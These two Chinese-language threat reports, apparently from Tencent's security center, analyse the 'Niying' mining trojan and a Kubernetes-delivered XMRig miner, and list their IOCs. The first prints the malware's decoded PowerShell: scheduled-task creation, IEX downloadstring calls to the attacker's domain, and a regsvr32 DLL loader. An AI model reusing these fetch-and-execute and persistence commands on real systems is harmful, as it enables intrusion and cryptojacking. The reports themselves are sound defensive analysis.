感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/WoYcqgC-xXtM2s752215yQ 一、背景 腾讯安全威胁情报中心检测到“匿影”挖矿木马变种攻击。该变种木马依然利用永恒之蓝漏洞进行攻击传播，通过计划任务、WMI后门进行本地持久化，然后在攻陷机器下载XMRig矿机挖矿门罗币、下载nbminer矿机挖矿HNS（Handshake），还会利用regsvr32.exe加载执行DLL形式的木马程序，匿影木马新变种在已安装腾讯电脑管家等数款安全软件的电脑上不运行，试图避免被安全厂商检测到。 “匿影”挖矿木马擅长利用利用各类公共网址进行数据统计和木马下载，此次变种攻陷了某旅游文化网站并将其作为木马下载服务器，其使用过的公共网址如下： upload.ee 免费网盘 anonfiles.com 免费图床 sowcar.com 免费图床 popo8.com 免费图床 img.vim-cn.com 免费图床 urlxxx.at.ua 建站服务 mywebnew.ucoz.pl 建站服务 addressnet.do.am 建站服务 googlenew.moy.su 建站服务 ludengapp.com 某设计公司网站 worldyou.top 某文旅公司网站（新） 二、样本分析 “匿影”挖矿木马释放永恒之蓝漏洞利用攻击程序包到C:\Users\Public目录下并启动主程序storageg.exe开始扫描攻击。   在攻陷的目标机器执行Payload（x86.dll或x64.dll）, Payload会检测腾讯电脑管家、金山毒霸等杀软是否存在，若不存在继续执行一段Base64编码的Powershell命令。 Base64编码的Powershell命令解码后内容如下： schtasks /create /ru system /sc MINUTE /mo 80 /tn VNware /tr "powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBtAHkAdwBlAGIAcwBhAGEAdAAuAHgAeQB6AC8AdgBpAHAALgB0AHgAdAAnACkAKQA=" 该命令安装名为“VNware ”的计划任务，每隔80分钟执行一次另一段经过base64编码的Powershell命令，同样，解码后内容如下： IEX ((new-object net.webclient).downloadstring('http[:]//mywebsaat.xyz/vip.txt')) 然后计划任务从http[:]//mywebsaat.xyz/vip.txt下载vip.txt反复运行，并完成以下功能： 1、访问统计页面，记录攻击次数 2、安装计划任务“PCHunterDNS”和”\Microsoft\Windows\UPnP\Services”进而持久化执行恶意代码： IEX ((new-object net.webclient).downloadstring('https[:]//mywebsaat.xyz/123.jpg')) 3、通过注册表修改操作，关闭Windows Defender，同时开启WDigest缓存（可以从内存缓存中窃密用户名和登陆密码）。 在执行该步骤前，脚本会从百度官网下载LOGO图标https[:]//www.baidu.com/img/bd_logo1.png，并保存为C:\ProgramData\Defender.txt，通过判断该文件是否存在，来确认这个步骤是否执行过。 4、安装WMI后门（事件过滤器“fuckamm3”、事件消费者“fuckamm4”）持久化运行恶意代码IEX ((new-object net.webclient).downloadstring(‘http[:]//mywebsaat.xyz/kp.txt’))，而“fuckamm3”、“fuckamm4”是Mykings挖矿僵尸网络团伙使用的WMI后门名称，推测“匿影”挖矿木马团伙与Mykings挖矿僵尸网络可能有一定的关联。 5、下载和启动挖矿程序，脚本会从多个地址下载不同的挖矿程序，存放在不同的路径下，具体样本如下： C:\Users\Public\MicrosftEdgeCP.exe是显卡挖矿软件NBMiner （https://github.com/NebuTech/NBMiner/releases），支持NVIDIA、AMD显卡，支持GRIN、AE、CKB、SERO、SIPC、BTM、ETH、SWAP等币种的挖矿。 其中某旅游文化公司网站也被黑客攻陷作为挖矿木马下载服务器： WMI后门中的Powershell脚本kp.txt还会下载DLL木马https[:]//rss.mywebsaat.xyz/cccdll.jpg并利用regsvr32.exe加载执行，然后通过该DLL启动挖矿木马。 new-object System.Net.WebClient).DownloadFile( 'https[:]//rss.mywebsaat.xyz/cccdll.jpg','C:\Users\Public\eos.dll') `Start-Process -FilePath C:\Windows\SysWOW64\regsvr32.exe '/s C:\Users\Public\eos.dll'` 完成挖矿木马启动和持久化过程后，继续下载永恒之蓝攻击模块http[:]//rss.mywebsaat.xyz/yh.jpg，启动下一轮攻击： IOCs Domain mywebsaat.xyz rss.mywebsaat.xyz URL https[:]//www.upload.ee/files/11799957/1.txt.html https[:]//www.upload.ee/files/11814903/1.txt.html https[:]//www.upload.ee/files/11815494/1.txt.html https[:]//www.upload.ee/files/11816420/1.txt.html https[:]//www.upload.ee/files/11816445/1.txt.html https[:]//www.upload.ee/files/11822214/1.txt.html http[:]//mywebsaat.xyz/999.jpg https[:]//mywebsaat.xyz/xmr.jpg http[:]//mywebsaat.xyz/nb.jpg http[:]//mywebsaat.xyz/yh.jpg http[:]//mywebsaat.xyzc.jpg http[:]//mywebsaat.xyz/fxtxt.jpg http[:]//mywebsaat.xyzakhost.jpg http[:]//rss.mywebsaat.xyz/xmr.jpg http[:]//rss.mywebsaat.xyzakhost.jpg http[:]//rss.mywebsaat.xyz/nb.jpg http[:]//rss.mywebsaat.xyz/yh.jpg http[:]//rss.mywebsaat.xyzc.jpg http[:]//rss.mywebsaat.xyz/fxtxt.jpg https[:]//mywebsaat.xyz/cccdll.jpg http[:]//mywebsaat.xyz/kp.txt https[:]//mywebsaat.xyz/123.jpg http[:]//www.worldyou.top/images/xmr.jpg http[:]//www.worldyou.top/images/tsakhost.jpg http[:]//www.worldyou.top/images/999.jpg http[:]//www.worldyou.top/images/btc.jpg http[:]//www.worldyou.top/images/fxtxt.jpg http[:]//www.worldyou.top/images/nb.jpg http[:]//www.worldyou.top/images/sd.jpg http[:]//www.worldyou.top/images/yh.jpg MD5 33110e53078ed5a0cf440d182878f30b 441a61cdd30502b3fcca03c28ccb49e8 5e20062b94f38e447be60f9f2b0286cd ee5d5f0e0fe7db7186f72d3d5256b1be f4fbfb10c441974ef5b892a35b08e6eb 85f25f9264664111f7df6dc76320b90b

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/sBiSo9fxONI60HxGnlB-Bg   近日，腾讯安全团队接受到部分用户反馈，部分Linux主机检测到名为docker的木马文件。经现场提取排查线索后，发现该挖矿木马疑似通过低版本Kubernetes组件入侵。入侵成功后在机器内执行恶意sh脚本，恶意脚本则进行同类木马清理，同时从82.146.53.166地址拉取矿机，配置后进行非法挖矿，目前看到的恶意sh脚本主要有以下2个版本。 版本一 功能结束当前机器内的其它挖矿相关模块，下载执行32/64不同版本的elf矿机程序到主机内tmp目录命名为docker，拉取矿机配置，执行矿机后删除本地矿机相关文件。 版本二 功能为结束当前机器内的其它挖矿相关模块，下载执行32/64不同版本的elf矿机程序到主机内tmp目录命名为php，拉取矿机配置，执行矿机后再删除本地矿机相关文件。该版本脚本同时增加了计划任务项，每分钟尝试执行一次sh脚本。 Tmp下名为docker或php的门罗币挖矿矿机，执行后会进行门罗币挖矿。 安全建议 1.排查清理主机root目录下，tmp目录下的docker名可疑矿机，php名可疑矿机文件； 2.排查crontab任务列表，删除异常的定时任务项； 3.查看机器内kubernetes组件，将其升级到最新版本； 4.Kubelet 外部访问配置认证授权，禁止匿名访问。 参考链接： https://cloud.tencent.com/developer/article/1549244 https://k8smeetup.github.io/docs/admin/kubelet-authentication-authorization/ https://github.com/easzlab/kubeasz/pull/192 https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c 关于Kubernetes Kubernetes是一个全新的基于容器技术的分布式架构领先方案。是Google内部集群管理系统Borg的一个开源版本。Kubernetes是一个开放的开发平台，不局限于任何一种语言，没有限定任何编程接口，是一个完备的分布式系统支撑平台。它构建在docker之上，提供应用部署、维护、扩展机制等功能，利用Kubernetes能方便地管理跨机器运行容器化的应用。 IOCs URL: hxxp://82.146.53.166/cr2.sh hxxp://82.146.53.166/xmrig_32 hxxp://82.146.53.166/p.conf hxxp://82.146.53.166/xmrig_64   MD5: 57b4ba0357815e44d8a1ac8e9c9dc7ab afb662fa877d773dafbaa47658ac176a 5110222de7330a371c83af67d46c4242